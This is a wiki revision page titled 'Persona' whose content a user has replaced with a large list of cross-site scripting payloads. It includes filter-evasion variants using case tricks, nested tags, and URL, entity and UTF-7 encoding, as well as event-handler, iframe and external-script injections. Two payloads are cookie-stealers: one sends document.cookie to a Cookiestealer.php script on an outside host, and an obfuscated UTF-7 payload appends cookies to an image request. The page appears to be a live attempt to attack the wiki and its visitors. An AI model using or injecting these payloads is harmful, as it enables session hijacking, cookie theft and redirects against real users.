Persona

  • Revision slug: Persona
  • Revision title: Persona
  • Revision id: 320023
  • Created:
  • Creator: Vaibs
  • Is current revision? No
  • Comment

Revision Content

<script>ALeRt("hi");</script> <script>alert(1)</script> abc “><script>alert(document.cookie)</script> “><script>alert(" XSSED by Vaibs")</script> “><script>prompt(1)</script> “><script>prompt(alert(document.cookie))</script> <scr<script>ipt>alert(document.cookie)ipt> <scr<script>ipt>prompt(alert(document.cookie))ipt> <script>ALeRt("hi");</script> %3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e '"></scr<script></scr<script>

Revision Source

<ScRipt>ALeRt("hi");</sCRipT>
			&lt;script&gt;alert(1)&lt;/script&gt; 	
<font style="color:expression(alert(1))">abc</font>
 “><script >alert(document.cookie)</script>
 “><script >alert(" XSSED by Vaibs")</script>
 “><script >prompt(1)</script>
				 “><script >prompt(alert(document.cookie))</script>
					<scr<script>ipt>alert(document.cookie)</scr</script>ipt>
										<scr<script>ipt>prompt(alert(document.cookie))</scr</script>ipt>
			    <ScRipt>ALeRt("hi");</sCRipT>
				%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%22%48%69%22%29%3b%3c%2f%73%63%72%69%70%74%3e

'"><iframe src=//xssed.com>&FromMail=&Me
		'; alert(1); '
		<a href=javascript: { {({}{}()())}alert('xss') ) ) }>

<div onload..;,;..'alert(\"xss_attack\");'>

<a href='javascript:{ alert(\"xss_attack\"); otherxss();}'
 onclick= 'alert(\"xss_attack\");' onhover='alert
(\"xss_attack\");' onmouseout=alert(\"xss_attack\")
class='thisclass'> link</a>

style='width:expression(alert(\"xss_attack\"));
	%253cscript%253ealert(document.cookie)%253c/script%253e
		“><s”%2b”cript>alert(document.cookie)</script>
	var i=0; for(i=0;i<=5;i++){alert('Cross Website Scripting');}
		“><ScRiPt>alert(document.cookie)</script>
		“><<script>alert(document.cookie);//<</script>
	foo%00<script>alert(document.cookie)</script>
	%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
			/*-->]]>%>?></object></script></title></textarea></noscript></style></xmp>'-/"/-alert(1)//><img src=1onerror=alert(1)>'

	‘; alert(document.cookie); var foo=’
	foo\’; alert(document.cookie);//’;
	</script><script >alert(document.cookie)</script>
	"><#$%&/><img src=asdf onerror=alert(document.cookie)>
	<BODY ONLOAD=alert(’XSS’)>Other XSS that don’t require <script>:	
	<BODY ONLOAD=alert(’XSS’)>
</textarea>"><#$%&/><script>alert(document.cookie)</script>
	<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
	<IMG SRC="jav	ascript:alert('XSS');">
	<IMG SRC="jav&#x0D;ascript:alert('XSS');">
	<IMG SRC="   javascript:alert('XSS');">
	<iframe src=http://ha.ckers.org/scriptlet.html <
	<SCRIPT SRC=//ha.ckers.org/.j>
	<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
	<BODY BACKGROUND="javascript:alert('XSS')">
	<BODY ONLOAD=alert('XSS')>
	<IMG DYNSRC="javascript:alert('XSS')">
	<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
	</TITLE><SCRIPT>alert("XSS");</SCRIPT>
	<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
	<IMG LOWSRC="javascript:alert('XSS')">
	<BR SIZE="&{alert('XSS')}">
	<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
	<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
	Pic pop "><script>location="http://vaibs.comuv.com/MS.jpg";</script>
	steal cookie "><Script>document.location = 'http://vaibs.comuv.com/Cookiestealer.php?cookie=' + document.cookie; </Script>
	 redirect <meta http-equiv="refresh" content="0;url=http://www.facebook.com/vaibstechboy" />
	 <script>alert("1337`")</script> <BODY ONLOAD=alert(document.cookie)>"><script>alert(1337`);</script> <script>window.document.write("<input type='file'>");</script> <a rel='nofollow' href='search?searchterm=<b>war10rd made you click on link</b>'>war10rd`</a> 
	 '+alert(1)+' 	
	 +ADw-script+AD4-alert(/xss/)+ADsAPA-/script+AD4-
	 +ADw-script+AD4-document.write(String.fromCharCode(60,105,109,103,32,115,114,99,61,104,116,116,112,58,47,47,115,105,116,101,119,97,116,99,104,47,113,97,47,99,111,111,107,105,101,46,112,104,112,47).concat(document.cookie).concat(String.fromCharCode(20,47,62)))+ADsAPA-/script+AD4-
	 	+}<%2Fstyle><script>a%3Deval%3Bb%3Dalert%3Ba(b(%2FXSS%2F.source))%3B<%2Fscript><MARQUEE+BGCOLOR%3D"RED"><H1>XSS3d+by+haRI(topsecure.net)<%2FH1><%2FMARQUEE>
Revert to this revision